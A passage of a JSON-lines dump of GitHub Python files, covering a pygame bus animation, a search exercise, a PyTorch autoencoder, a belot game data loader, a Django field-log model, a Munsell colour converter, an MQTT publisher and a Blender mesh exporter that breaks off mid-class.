4)\r\n\r\n    # The bus driver\r\n    pygame.draw.circle(screen, man, (int(wheel1_x) + 112, 340), 8)\r\n    pygame.draw.circle(screen, black, (int(wheel1_x) + 117, 340), 1)\r\n    pygame.draw.line(screen, red, (wheel1_x+115, 344), (wheel1_x+117,344), 1)\r\n    pygame.draw.line(screen, blue, (wheel1_x+112, 348), (wheel1_x+122,355), 3)\r\n    pygame.draw.line(screen, blue, (wheel1_x+112, 348), (wheel1_x+112,355), 4)\r\n\r\n    # The bus\r\n    pygame.draw.rect(screen, red, (wheel1_x - 30, 355 , 163, 40))\r\n    pygame.draw.rect(screen, red, (wheel1_x - 29, 325 , 65, 30), 4)\r\n    pygame.draw.rect(screen, red, (wheel1_x + 35, 325 , 66, 30), 4)\r\n    pygame.draw.rect(screen, red, (wheel1_x + 100, 325 , 31, 30), 4)\r\n\r\n    # Wheels \r\n    pygame.draw.circle(screen, black, (int(wheel1_x), wheel1_y), 15)\r\n    pygame.draw.circle(screen, black, (int(wheel1_x) + 105, wheel1_y), 15)\r\n    pygame.draw.circle(screen, grey, (int(wheel1_x), wheel1_y), 11, 2)\r\n    pygame.draw.circle(screen, grey, (int(wheel1_x) + 105, wheel1_y), 11, 2)\r\n    \r\n    pygame.draw.line(screen, grey, (x,y),\r\n                     (2*wheel1_x - x, 2 * wheel1_y - y), 1)\r\n    pygame.draw.line(screen, grey, (x1,y1),\r\n                     (2*wheel1_x - x1, 2 * wheel1_y - y1), 1)\r\n\r\n    pygame.draw.line(screen, grey, (x+105,y),\r\n                     (2*wheel1_x - x+105, 2 * wheel1_y - y), 1)\r\n    pygame.draw.line(screen, grey, (x1+105,y1),\r\n                     (2*wheel1_x - x1+105, 2 * wheel1_y - y1), 1)\r\n\r\n    # Move the bus\r\n    if wheel1_x < 540 or time > 100:\r\n        wheel1_x += wheel1_change\r\n    else:\r\n        time += 2\r\n    \r\n    # Move the passenger \r\n    if pas_x > 600: \r\n        pas_x -= pas_change\r\n        foot += 1\r\n\r\n    # Loop the animation \r\n    if wheel1_x == 900:\r\n        time2 += 1\r\n    if time2 > 0 and time2 < 100:\r\n        time2 += 1\r\n    if time2 >= 100:\r\n        wheel1_x = -2000\r\n        pas_x = 1000\r\n        time = 0\r\n        time2 = 0\r\n        foot = 2\r\n        i = 0\r\n\r\n    window.blit(screen, (0, 0))\r\n    window.blit(road, (0,400))\r\n    pygame.display.flip()\r\n    pygame.time.delay(10)\r\npygame.quit()\r\n","repo_name":"RustyDanya/programming-on-python","sub_path":"lab_04/04_pygame.py","file_name":"04_pygame.py","file_ext":"py","file_size_in_byte":5869,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
{"seq_id":"28217558450","text":"if __name__ == \"__main__\":\n    arr = list(map(int, input().split()))\n    k = int(input())\n    x = int(input())\n    i = 0\n    flag = 0\n    while(i < len(arr)):\n        if arr[i] == x:\n            print(i)\n            flag = 1\n        diff = x-arr[i]\n        i = i + max(1, int(abs(arr[i] - x) / k))\n    if flag == 0:\n        print(\"Not Present\")\n","repo_name":"Aditi219/dsa-Sheet","sub_path":"searching and sorting/adjacentDifferByK_E.py","file_name":"adjacentDifferByK_E.py","file_ext":"py","file_size_in_byte":345,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
{"seq_id":"5911701790","text":"# -*- encoding = utf-8 -*-\n\"\"\"\n@File : AE.py\n@Time : 1/27/21 2:51 PM\n@Author : Liangliang\n@Software: PyCharm\n\"\"\"\nimport numpy as np\nimport torch\nimport torch.nn as nn\nfrom torch import optim as optimizer\n\n\nclass autoencoder(nn.Module):\n    def __init__(self, X, number=[200, 100, 50]):\n        super(autoencoder, self).__init__()\n        self.layer1 = nn.Linear(number[0], number[1])\n        self.layer2 = nn.Linear(number[1],number[2])\n        self.layer3 = nn.Linear(number[2], number[1])\n        self.layer4 = nn.Linear(number[1], number[0])\n        self.X = torch.FloatTensor(X)\n    def forward(self):\n        h = self.layer1(self.X)\n        h = torch.sigmoid(h)\n        h = self.layer2(h)\n        h = torch.sigmoid(h)\n        h = self.layer3(h)\n        h = torch.sigmoid(h)\n        h = self.layer4(h)\n        return h\n\ndef Loss(X, Y):\n    loss = torch.norm(X-Y, 'fro')/X.shape[1]\n    return loss\n\ndef train(X):\n    X = torch.FloatTensor(X)\n    number = [X.shape[1], 100, 50]\n    net = autoencoder(X, number)\n    optimizer = torch.optim.SGD(net.parameters(), lr=0.152)\n    for _ in range(100):\n        Y = net.forward()\n        loss = Loss(X, Y)\n        optimizer.zero_grad()\n        loss.backward()\n        optimizer.step()\n    return Y.detach()\n\n","repo_name":"hmliangliang/GNN-MNA","sub_path":"GNN-NMA/AE.py","file_name":"AE.py","file_ext":"py","file_size_in_byte":1258,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
{"seq_id":"74528389983","text":"from model.Entitet import Entitet\nfrom model.Igrac import Igrac\nfrom model.Lokacija import Lokacija\nfrom model.MjesanjeDvaUnosa import MjesanjeDvaUnosa\nfrom model.MjesanjeTriUnosa import MjesanjeTriUnosa\nfrom model.PartijaDvaIgraca import PartijaDvaIgraca\nimport json\n\nfrom model.PartijaDvaPara import PartijaDvaPara\nfrom model.PartijaTriIgraca import PartijaTriIgraca\n\n\nclass Start:\n    def __init__(self):\n        self._partije = []\n        self.ucitajPartije()\n        for p in self._partije:\n            print(p)\n        #self.testiranje()\n\n    def testiranje(self):\n        e = Entitet(1) # an abstract class can be instantiated\n        print(e.sifra)\n        igrac = Igrac(1, \"Tomislav\", \"Jakopec\", \"\", 1)\n        print(igrac.sifra)\n        # mjesanje = Mjesanje(1) #TypeError: Can't instantiate abstract class 
Mjesanje with abstract methods get_rezultat\n\n mjesanje = MjesanjeDvaUnosa()\n mjesanje.bodova_prvi_unos = 23\n mjesanje.zvanje_prvi_unos = 20\n mjesanje.bodova_drugi_unos = 78\n\n print('Mješanje DVA unosa', mjesanje.get_rezultat().prvi, ' - ', mjesanje.get_rezultat().drugi)\n\n mjesanje = MjesanjeTriUnosa()\n mjesanje.bodova_prvi_unos = 23\n mjesanje.zvanje_prvi_unos = 20\n mjesanje.bodova_drugi_unos = 78\n mjesanje.bodova_treci_unos = 61\n\n print('Mješanje TRI unosa', mjesanje.get_rezultat().prvi, ' - ', mjesanje.get_rezultat().drugi, ' - ',\n mjesanje.get_rezultat().treci)\n\n partija = PartijaDvaIgraca()\n mjesanje = MjesanjeDvaUnosa()\n mjesanje.bodova_prvi_unos = 23\n mjesanje.zvanje_prvi_unos = 20\n mjesanje.bodova_drugi_unos = 78\n partija.mjesanja.append(mjesanje)\n mjesanje = MjesanjeDvaUnosa()\n mjesanje.bodova_prvi_unos = 23\n mjesanje.zvanje_prvi_unos = 20\n mjesanje.bodova_drugi_unos = 78\n partija.mjesanja.append(mjesanje)\n\n print(partija)\n\n def ucitajPartije(self):\n with open('../podaci.json') as json_file:\n partije = json.load(json_file)\n for p in partije:\n if len(p['igraci']) == 2:\n partija = PartijaDvaIgraca()\n elif len(p['igraci']) == 3:\n partija = PartijaTriIgraca()\n elif len(p['igraci']) == 4:\n partija = PartijaDvaPara()\n\n partija.do_koliko_se_igra = p['doKolikoSeIgra']\n\n unosi = Igrac()\n unosi.sifra = p['unosi']['id']\n unosi.ime = p['unosi']['ime']\n unosi.prezime = p['unosi']['prezime']\n unosi.spol = p['unosi']['spol']\n partija.unosi = unosi\n\n lokacija = Lokacija()\n lokacija.sifra = p['lokacija']['id']\n lokacija.longitude = p['lokacija']['longitude']\n lokacija.latitude = p['lokacija']['latitude']\n lokacija.naziv = p['lokacija']['naziv']\n partija.lokacija = lokacija\n\n for i in p['igraci']:\n igrac = Igrac()\n igrac.sifra = i['id']\n igrac.ime = i['ime']\n igrac.prezime = i['prezime']\n igrac.spol = i['spol']\n partija.igraci.append(igrac)\n\n for m in p['mjesanja']:\n\n if 'bodovaTreciUnos' in m:\n mjesanje = MjesanjeTriUnosa()\n mjesanje.bodova_treci_unos = m['bodovaTreciUnos']\n mjesanje.zvanje_treci_unos = m['zvanjeTreciUnos']\n else:\n mjesanje = MjesanjeDvaUnosa()\n mjesanje.sifra = m['id']\n mjesanje.datum_unosa = m['datumUnosa']\n mjesanje.stiglja = m['stiglja']\n mjesanje.belot = m['belot']\n mjesanje.bodova_prvi_unos = m['bodovaPrviUnos']\n mjesanje.zvanje_prvi_unos = m['zvanjePrviUnos']\n mjesanje.bodova_drugi_unos = m['bodovaDrugiUnos']\n mjesanje.zvanje_drugi_unos = m['zvanjeDrugiUnos']\n partija.mjesanja.append(mjesanje)\n\n\n\n\n\n self._partije.append(partija)\n\n\nStart()\n","repo_name":"tjakopec/OOP_JAVA_PHP_PYTHON_SWIFT","sub_path":"Python/model/Start.py","file_name":"Start.py","file_ext":"py","file_size_in_byte":4281,"program_lang":"python","lang":"sh","doc_type":"code","stars":6,"dataset":"github-code","pt":"7"} +{"seq_id":"7947378264","text":"from django.db import models\nimport datetime\nfrom fieldlogs.settings import *\n\nclass Log(models.Model):\n created = models.DateTimeField(auto_now_add = True)\n updated = models.DateTimeField(auto_now = True)\n\n latitude = models.FloatField()\n longitude = models.FloatField()\n location = models.CharField( max_length = 100, null = True, blank = True, help_text = 'Name of Location if any' )\n\n subject = models.CharField( max_length = 100 )\n comment = models.TextField( null = True, blank = True )\n\n nationality = models.CharField( max_length = 50, choices = LOG_NATIONALITIES )\n birthdate = models.DateField( verbose_name = 'Date of Birth' )\n\n barcode = 
models.TextField( null = True, blank = True, verbose_name = 'Raw BarCode Value', help_text = 'Raw Scanned Bar-Code Value' )\n\n def photo_upload_to(instance,filename):\n return \"%s/%s/%s\" % ('photo',instance.id,filename)\n photo = models.ImageField(upload_to = photo_upload_to, null=True, blank=True, help_text = 'Photo affiliated to this Log')\n photo_caption = models.CharField( max_length = 100, null=True, blank=True)\n\n def signature_upload_to(instance,filename):\n return \"%s/%s/%s\" % ('signature',instance.id,filename)\n signature = models.ImageField(upload_to = signature_upload_to, help_text = 'Signature of Data Entrant')\n def age(self):\n return (datetime.date.today() - self.birthdate).days/365\n def view_age(self):\n return '%s Years Old' % self.age()\n view_age.short_description = 'Age'\n def view_location(self):\n #return '''\n return '''\n \n ''' % {'lat':self.latitude, 'lng':self.longitude, 'icon_uri' : '%s/images/map.png' % STATIC_URL}\n view_location.short_description = 'View Location'\n view_location.allow_tags= True\n def view_photo(self):\n try:\n return '' % (self.photo.url)\n except:\n return '' % (DEFAULT_PHOTO_URI)\n view_photo.short_description = 'Affiliated Photo'\n view_photo.allow_tags= True\n def view_signature(self):\n try:\n return '' % (self.signature.url, self.photo_caption)\n except:\n return '' % (DEFAULT_SIG_URI)\n view_signature.short_description = 'Affiliated Signature'\n view_signature.allow_tags= True\n\n def to_dict(self):\n photo_uri = ''\n try:\n photo_uri = self.photo.url\n except:\n pass\n\n sig_uri = ''\n try:\n sig_uri = self.signature.url\n except:\n pass\n\n return {\n 'ID' : self.id,\n 'LATITUDE' : self.latitude,\n 'LONGITUDE' : self.longitude,\n 'LOCATION' : self.location,\n 'SUBJECT' : self.subject,\n 'COMMENT' : self.comment,\n 'NATIONALITY' : self.get_nationality_display(),\n 'BIRTHDATE' : self.birthdate.strftime('%Y-%m-%d'),\n 'BARCODE' : self.barcode,\n 'PHOTO' : photo_uri,\n 'PHOTO_CAPTION' : self.photo_caption,\n 'SIGNATURE' : sig_uri,\n 'CREATED' : self.created.strftime('%Y-%m-%d %H:%M')\n }\n\n class Meta:\n db_table = 'logs'\n verbose_name = 'Field Log'\n verbose_name_plural = 'Field Logs'\n\n","repo_name":"mcnemesis/fieldlogs","sub_path":"logs/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3714,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"40189599811","text":"import math\nimport re\nimport sys\n\nfrom utils.table import table\n\n\nclass MunsellColor(object):\n '''\n This object represents a color from the Munsell color system [1].\n It stores three values: the hue, value and chroma.\n The hue should be formatted as 'stepPRINCIPAL', eg. '5R' or '8PB'.\n Step is a float from 0 to 10. The value ranges from 0 (black) to\n 10 (white). Chroma represents the purity of the color. 
It is\n    also a float.\n    Example Usage\n    =============\n    >>> import munsell\n    >>> c = munsell.MunsellColor('10GY', 8, 16)\n    >>> c.to_rgb()\n    (0.2794503352552019, 0.9074706287302171, 0.2523704238358717)\n    >>> [hex(int(i * 255)) for i in c.to_rgb()]\n    ['0x47', '0xe7', '0x40']\n    [1] http://en.wikipedia.org/wiki/Munsell_color_system\n    '''\n\n    def __init__(self, hue, value, chroma):\n        self.hue = hue\n        self.value = value\n        self.chroma = chroma\n\n    def to_rgb(self):\n        '''\n        This converts the Munsell color to a RGB color.\n        The conversion is not exact, but is quite close.\n        Will return a tuple of floats if successful.\n        Can raise TableNotFoundError, NotInTableError.\n        '''\n        if self.chroma == 0:\n            return self._to_rgb_gray()\n\n        xyY = table.get(str(self))\n        if xyY is None:\n            return self._to_rgb_interpolate()\n\n        return self._rgb_delinearize(self._xyy_to_rgb_linear(*xyY))\n\n    def _to_rgb_gray(self):\n        v = 255 * (self.value / 10.0)\n        return (v, v, v)\n\n    def _to_rgb_interpolate(self):\n        value = self._find_valid_value\n        mv = self.value\n        step, principal = self.split_hue(self.hue)\n\n        # Find the closest hue/chroma values in the table that are\n        # above and below our color\n        step_above = self._vaild_step(math.ceil(float(step) / 2.5) * 2.5)\n        ha = '{}{}'.format(step_above, principal)\n        ca = max(int(math.ceil(self.chroma / 2.0) * 2), 2)\n\n        step_below = self._vaild_step(math.floor(float(step) / 2.5) * 2.5)\n        hb = '{}{}'.format(step_below, principal)\n        cb = max(int(math.floor(self.chroma / 2.0) * 2), 2)\n\n        # rgb, difference factor\n        a, ad = self._interpolate_munsell(\n            MunsellColor(ha, value(ha, mv, ca, 1), ca),\n            MunsellColor(hb, value(hb, mv, ca, 1), ca))\n        b, bd = self._interpolate_munsell(\n            MunsellColor(ha, value(ha, mv, ca, -1), ca),\n            MunsellColor(hb, value(hb, mv, ca, -1), ca))\n        c, cd = self._interpolate_munsell(\n            MunsellColor(ha, value(ha, mv, cb, 1), cb),\n            MunsellColor(hb, value(hb, mv, cb, 1), cb))\n        d, dd = self._interpolate_munsell(\n            MunsellColor(ha, value(ha, mv, cb, -1), cb),\n            MunsellColor(hb, value(hb, mv, cb, -1), cb))\n\n        e, ed = self._interpolate_rgb(a, b, ad, bd)\n        f, fd = self._interpolate_rgb(c, d, cd, dd)\n        return self._interpolate_rgb(f, e, ed, fd)[0]\n\n    def _interpolate_munsell(self, a, b):\n        # Generate 'closeness factors' [0-1] of the a/b colors to\n        # the original colors\n        step = float(self.split_hue(self.hue)[0])\n        step_a = float(self.split_hue(a.hue)[0])\n        step_b = float(self.split_hue(b.hue)[0])\n\n        hue_a, hue_b = self._closness_factors(step_a, step_b, step)\n        value_a, value_b = self._closness_factors(a.value, b.value, self.value)\n        chroma_a, chroma_b = self._closness_factors(a.chroma, b.chroma, self.chroma)\n        closness_a = self._average_not_none(hue_a, value_a, chroma_a)\n        closness_b = self._average_not_none(hue_b, value_b, chroma_b)\n\n        total_diff = abs(step - step_a) + abs(step - step_b) \\\n            + abs(self.value - a.value) + abs(self.value - b.value) \\\n            + abs(self.chroma - a.chroma) \\\n            + abs(self.chroma - b.chroma)\n\n        # Blend the above/below colors based on the closeness\n        return tuple([a * closness_a + b * closness_b for \\\n            a, b in zip(a.to_rgb(), b.to_rgb())]), total_diff\n\n    def _interpolate_rgb(self, a, b, ad, bd):\n        # Opposite of the percentage of the difference, so flip a\n        # and b around\n        if ad + bd == 0:\n            return tuple([a * 0.5 + b * 0.5 for a, b in zip(a, b)]), 0\n\n        if ad == 0:\n            return a, 0\n        if bd == 0:\n            return b, 0\n\n        a_closness = bd / (ad + bd)\n        b_closness = ad / (ad + bd)\n        return tuple([a * a_closness + b * b_closness for \\\n            a, b in zip(a, b)]), ad + bd\n\n    def is_real(self):\n        '''\n        Tests if this is a real color, by checking if it can be\n        represented using RGB.\n        '''\n        for v in self.to_rgb():\n            if v > 1.0:\n                return False\n        return True\n\n    def __str__(self):\n        return '{} {} {}'.format(self.hue, self.value, int(self.chroma))\n\n    def max_chroma(self, hue, value):\n        m = 2\n        while True:\n            if '{} {} {}'.format(hue, value, m) in table:\n                m += 2\n            else:\n                return m - 2\n\n    def split_hue(self, hue):\n        return re.match('([0-9.]+)([A-Z]+)', hue).groups()\n\n\n    def _xyy_to_rgb_linear(self, x, y, y2):\n        if abs(y) < 1e-100:\n            y = 1e-100\n        y2 /= 100\n        x2 = y2 * x / y\n        z2 = y2 * (1 - x - y) / y\n        return (3.2406 * x2 - 1.5372 * y2 - 0.4986 * z2,\n                -0.9689 * x2 + 1.8758 * y2 + 0.0415 * z2,\n                0.0557 * x2 - 0.2040 * y2 + 1.0570 * z2)\n\n\n    def _rgb_delinearize(self, rgb):\n        ans = [0, 0, 0]\n        for i, c in enumerate(rgb):\n            if c <= 0.0031308:\n                ans[i] = 12.92 * c\n            else:\n                ans[i] = 1.055 * math.pow(c, 1 / 2.4) - 0.055\n        return tuple(ans)\n\n\n    def _vaild_step(self, step):\n        # Valid steps are 2.5, 5, 7.5 and 10\n        step = 10 if step > 10 else (2.5 if step < 2.5 else step)\n        return int(step) if int(step) == step else step\n\n\n    def _find_valid_value(self, hue, value, chroma, direction):\n        round_ = math.ceil if direction == 1 else math.floor\n        value = round_(value * 5) / 5\n        value = int(value) if value.is_integer() else value\n\n        direction_changed = False\n        while True:\n            if value > 10 or value < 0:\n                if direction_changed:\n                    sys.stderr.write('Trying to interpolate, but cannot find a valid value attribute')\n                direction *= -1\n                direction_changed = True\n\n            if '{} {} {}'.format(hue, value, chroma) in table:\n                return value\n\n            if (value > 1 and direction == 1) or (value > 2):\n                value += direction\n                value = int(value)\n            else:\n                value += 0.2 * direction\n                value = round(value, 1)\n                value = int(value) if value.is_integer() else value\n\n    def _closness_factors(self, a, b, orig):\n        if a == b:\n            return None, None\n        else:\n            total_diff = float(abs(orig - a) + abs(orig - b))\n            # Opposite of the percentage of the difference, so flip a\n            # and b around\n            return abs(orig - b) / total_diff, abs(orig - a) / total_diff\n\n\n    def _average_not_none(self, *values):\n        not_none = [float(i) for i in values if i is not None]\n        if len(not_none):\n            return sum(not_none) / len(not_none)\n        return 0.5\n","repo_name":"javiferfer/color-clustering","sub_path":"extracting_colors/utils/munsell_color.py","file_name":"munsell_color.py","file_ext":"py","file_size_in_byte":7785,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
{"seq_id":"10729072294","text":"import time\nfrom paho.mqtt import client as mqtt_client\nimport random\n\nbroker = '192.168.1.161'\nport = 1883\nclient_id = f'python-mqtt-{random.randint(0, 1000)}'\n\n\ndef connect_mqtt():\n    def on_connect(client, userdata, flags, rc):\n        if rc == 0:\n            print(\"Connected to MQTT Broker!\")\n        else:\n            print(\"Failed to connect, return code %d\\n\" % rc)\n    # Set Connecting Client ID\n    client = mqtt_client.Client(client_id)\n    client.on_connect = on_connect\n    client.connect(broker, port)\n    return client\n\n\ndef publish(client, topic, data):\n    if data is not None:\n        client.publish(topic, data)\n\n\ndef publishmany(client, basetopic, data):\n    for signal, values in data:\n        if values is not None:\n            
client.publish(''.join([basetopic, signal.capitalize()]), values)\n time.sleep(2/1000)\n\n# test = connect_mqtt()\n# publish(test)\n","repo_name":"Ar0sh/HomeAutoPython","sub_path":"mqtt_client.py","file_name":"mqtt_client.py","file_ext":"py","file_size_in_byte":859,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"22692093945","text":"import bpy\r\nimport bmesh\r\nimport mathutils\r\n\r\nfrom typing import (\r\n\tList,\r\n\tDict,\r\n\tTuple\r\n)\r\nfrom bpy.props import (\r\n\tStringProperty,\r\n\tBoolProperty,\r\n\tFloatProperty\r\n)\r\nfrom bpy_extras.io_utils import (\r\n\tExportHelper,\r\n\torientation_helper,\r\n\taxis_conversion\r\n)\r\n\r\nclass Vertex:\r\n\tdef __init__ (\r\n\t\tself,\r\n\t\tposition : Tuple[float, float, float],\r\n\t\tnormal : Tuple[float, float, float],\r\n\t\tjoint_ids : Tuple[int, int, int, int],\r\n\t\tweights : Tuple[float, float, float]\r\n\t):\r\n\t\tself.position = position\r\n\t\tself.normal = normal\r\n\t\tself.joint_ids = joint_ids\r\n\t\tself.weights = weights\r\n\r\nclass Mesh:\r\n\tdef __init__ (\r\n\t\tself\r\n\t):\r\n\t\tself.name_to_joint_id : Dict[str, int] = {}\r\n\t\tself.joints : List[bpy.types.Bone] = []\r\n\t\tself.verts : List[Vertex] = []\r\n\t\tself.tris : List[Tuple[int, int, int]] = []\r\n\r\n\tdef from_mesh_and_armature (\r\n\t\tblender_obj : bpy.types.Object,\r\n\t\tblender_mesh : bpy.types.Mesh,\r\n\t\tblender_armature : bpy.types.Armature\r\n\t):\r\n\t\tdef append_hierarchy (joints : List[bpy.types.Bone], bone : bpy.types.Bone):\r\n\t\t\tjoints.append (bone)\r\n\t\t\tfor child in bone.children:\r\n\t\t\t\tif child.use_deform:\r\n\t\t\t\t\tappend_hierarchy (joints, child)\r\n\r\n\t\tdef groups_to_tuple4 (a):\r\n\t\t\tif len (a) == 0:\r\n\t\t\t\treturn -1, -1, -1, -1\r\n\t\t\telif len (a) == 1:\r\n\t\t\t\treturn a[0], -1, -1, -1\r\n\t\t\telif len (a) == 2:\r\n\t\t\t\treturn a[0], a[1], -1, -1\r\n\t\t\telif len (a) == 3:\r\n\t\t\t\treturn a[0], a[1], a[2], -1\r\n\t\t\treturn a[0], a[1], a[2], a[3]\r\n\r\n\t\tdef weights_to_tuple3 (a):\r\n\t\t\tif len (a) == 0:\r\n\t\t\t\treturn 0, 0, 0\r\n\t\t\telif len (a) == 1:\r\n\t\t\t\treturn round (a[0], 6), 0, 0\r\n\t\t\telif len (a) == 2:\r\n\t\t\t\treturn round (a[0], 6), round (a[1], 6), 0\r\n\t\t\treturn round (a[0], 6), round (a[1], 6), round (a[2], 6)\r\n\r\n\t\tresult = Mesh ()\r\n\t\tif blender_armature is not None:\r\n\t\t\t# Fill skeleton data\r\n\t\t\troot = None\r\n\t\t\t# Find the root bone\r\n\t\t\tfor b in blender_armature.bones:\r\n\t\t\t\tif b.parent is None and b.use_deform:\r\n\t\t\t\t\tif root is not None:\r\n\t\t\t\t\t\traise Exception (\"Found multiple root bones in armature.\")\r\n\t\t\t\t\troot = b\r\n\t\t\tif root is None:\r\n\t\t\t\traise Exception (\"Could not find root bone.\")\r\n\t\t\tappend_hierarchy (result.joints, root)\r\n\t\t\tif len (result.joints) > 0x7fff:\r\n\t\t\t\traise Exception (f\"Armature has { len (result.joints) } bones, which is more than the maximum allowed ({0x7fff}).\")\r\n\t\t\tfor i, b in enumerate (result.joints):\r\n\t\t\t\tresult.name_to_joint_id.update ({ b.name : i })\r\n\t\t# Fill vertex and triangle data\r\n\t\tvert_group_names = { g.index : g.name for g in blender_obj.vertex_groups }\r\n\t\tvertices_dict = {}\r\n\t\tfor i, poly in enumerate (blender_mesh.polygons):\r\n\t\t\tif len (poly.vertices) != 3:\r\n\t\t\t\traise Exception (\"Mesh has polygons that are not triangles. 
Make sure to triangulate the mesh prior.\")\r\n\t\t\ttri = []\r\n\t\t\tfor j, vert_index in enumerate (poly.vertices):\r\n\t\t\t\tif vert_index in vertices_dict:\r\n\t\t\t\t\tresult_vert_index = vertices_dict[vert_index]\r\n\t\t\t\telse:\r\n\t\t\t\t\tresult_vert_index = len (result.verts)\r\n\t\t\t\t\tvertices_dict.update ({ vert_index : result_vert_index })\r\n\t\t\t\t\tvert = blender_mesh.vertices[vert_index]\r\n\t\t\t\t\tif len (vert.groups) != 0 and blender_armature is None:\r\n\t\t\t\t\t\traise Exception (\"Mesh has vertices assigned to vertex groups, but we could not find an armature associated with it. Make sure it is parented to an armature, or it has a valid skin modifier.\")\r\n\t\t\t\t\tif len (vert.groups) > 4:\r\n\t\t\t\t\t\traise Exception (f\"Vertex {vert_index} has more than 4 groups assigned to it.\")\r\n\t\t\t\t\tgroups = groups_to_tuple4 ([g.group for g in vert.groups])\r\n\t\t\t\t\tweights = weights_to_tuple3 ([g.weight for g in vert.groups])\r\n\t\t\t\t\tjoint_ids = [-1 for i in range (len (groups))]\r\n\t\t\t\t\tfor i in range (len (groups)):\r\n\t\t\t\t\t\tif groups[i] != -1:\r\n\t\t\t\t\t\t\tname = vert_group_names[groups[i]]\r\n\t\t\t\t\t\t\tif name not in result.name_to_joint_id:\r\n\t\t\t\t\t\t\t\traise Exception (f\"Vertex is assigned to group {name} but we could not find a deform bone with this name in the armature.\")\r\n\t\t\t\t\t\t\tjoint_ids[i] = result.name_to_joint_id[name]\r\n\t\t\t\t\tresult.verts.append (Vertex (\r\n\t\t\t\t\t\ttuple (vert.co),\r\n\t\t\t\t\t\ttuple (vert.normal),\r\n\t\t\t\t\t\ttuple (joint_ids),\r\n\t\t\t\t\t\tweights\r\n\t\t\t\t\t))\r\n\t\t\t\ttri.append (result_vert_index)\r\n\t\t\tresult.tris.append ((tri[0], tri[1], tri[2]))\r\n\r\n\t\treturn result\r\n\r\n\tdef write_text (self, filename : str):\r\n\t\twith open (filename, \"wb\") as file:\r\n\t\t\tfw = file.write\r\n\t\t\tfw (b\"[1]\\n\\n\")\t# Version\r\n\t\t\tfw (b\"joint_count %u\\n\" % len (self.joints))\r\n\t\t\tfw (b\"vertex_count %u\\n\" % len (self.verts))\r\n\t\t\tfw (b\"triangle_count %u\\n\\n\" % len (self.tris))\r\n\t\t\tfw (b\"joints:\\n\")\r\n\t\t\tfor joint in self.joints:\r\n\t\t\t\tfw (b\"%s\\n\" % bytes (joint.name, 'UTF-8'))\r\n\t\t\t\tif joint.parent is not None:\r\n\t\t\t\t\tlocal_transform = joint.parent.matrix_local.inverted () @ joint.matrix_local\r\n\t\t\t\telse:\r\n\t\t\t\t\tlocal_transform = joint.matrix_local\r\n\t\t\t\tfw (b\"%.6f %.6f %.6f %.6f\\n\" % local_transform[0][:])\r\n\t\t\t\tfw (b\"%.6f %.6f %.6f %.6f\\n\" % local_transform[1][:])\r\n\t\t\t\tfw (b\"%.6f %.6f %.6f %.6f\\n\" % local_transform[2][:])\r\n\t\t\t\tfw (b\"%.6f %.6f %.6f %.6f\\n\" % local_transform[3][:])\r\n\t\t\t\tif joint.parent is not None:\r\n\t\t\t\t\tfw (b\"%u\\n\\n\" % self.name_to_joint_id[joint.parent.name])\r\n\t\t\t\telse:\r\n\t\t\t\t\tfw (b\"-1\\n\\n\")\r\n\t\t\tfw (b\"vertices:\\n\")\r\n\t\t\tfor vert in self.verts:\r\n\t\t\t\tfw (b\"%.6f %.6f %.6f\\n\" % vert.position)\r\n\t\t\t\tfw (b\"%.6f %.6f %.6f\\n\" % vert.normal)\r\n\t\t\t\tfw (b\"%.6f %.6f %.6f\\n\" % vert.weights)\r\n\t\t\t\tfw (b\"%i %i %i %i\\n\" % vert.joint_ids)\r\n\t\t\t\tfw (b\"\\n\")\r\n\t\t\tfw (b\"triangles:\\n\")\r\n\t\t\tfor tri in self.tris:\r\n\t\t\t\tfw (b\"%u %u %u\\n\" % tuple (tri))\r\n\r\ndef export_meshes (\r\n\tcontext : bpy.types.Context,\r\n\tfilename : str,\r\n\tuse_selection : bool,\r\n\tapply_transform : bool,\r\n\taxis_conversion_matrix : mathutils.Matrix\r\n):\r\n\timport os\r\n\r\n\tif bpy.ops.object.mode_set.poll ():\r\n\t\tbpy.ops.object.mode_set (mode = 'OBJECT')\r\n\tif 
use_selection:\r\n\t\tobjs = context.selected_objects\r\n\telse:\r\n\t\tobjs = context.scene.objects\r\n\tfor obj in objs:\r\n\t\ttry:\r\n\t\t\tme = obj.to_mesh ()\r\n\t\texcept RuntimeError:\r\n\t\t\tcontinue\r\n\t\tarmature_obj = obj.find_armature ()\r\n\t\tarmature : bpy.types.Armature = None\r\n\t\tif armature_obj is not None:\r\n\t\t\tarmature = armature_obj.data.copy ()\r\n\t\t# Apply object transform and calculate normals\r\n\t\tif apply_transform:\r\n\t\t\tme.transform (obj.matrix_world)\r\n\t\t\tif armature is not None:\r\n\t\t\t\tarmature.transform (obj.matrix_world)\r\n\t\tif axis_conversion_matrix is not None:\r\n\t\t\tme.transform (axis_conversion_matrix.to_4x4 ())\r\n\t\t\tif armature is not None:\r\n\t\t\t\tarmature.transform (axis_conversion_matrix.to_4x4 ())\r\n\t\tme.calc_normals ()\r\n\t\t# Triangulate mesh\r\n\t\tbm = bmesh.new ()\r\n\t\tbm.from_mesh (me)\r\n\t\tbmesh.ops.triangulate (bm, faces = bm.faces[:])\r\n\t\tbm.to_mesh (me)\r\n\t\tbm.free ()\r\n\r\n\t\tresult = Mesh.from_mesh_and_armature (obj, me, armature)\r\n\t\toutput_filename = os.path.join (os.path.dirname (filename), obj.name) + Exporter.filename_ext\r\n\t\tresult.write_text (output_filename)\r\n\t\tobj.to_mesh_clear ()\r\n\t\tprint (f\"Exported mesh {obj.name} to file {output_filename}.\\n\")\r\n\r\n@orientation_helper (axis_forward = '-Z', axis_up = 'Y')\r\nclass Exporter (bpy.types.Operator, ExportHelper):\r\n\t\"\"\"Export mesh data\"\"\"\r\n\tbl_idname = \"export.anim_example_mesh\"\r\n\tbl_label = \"Export mesh with skinning (.mesh)\"\r\n\tbl_options = { 'REGISTER', 'UNDO' }\r\n\tfilename_ext = \".mesh\"\r\n\r\n\tuse_selection : BoolProperty (\r\n\t\tname = \"Only Selected\",\r\n\t\tdescription = \"Export only the selected meshes.\",\r\n\t\tdefault = 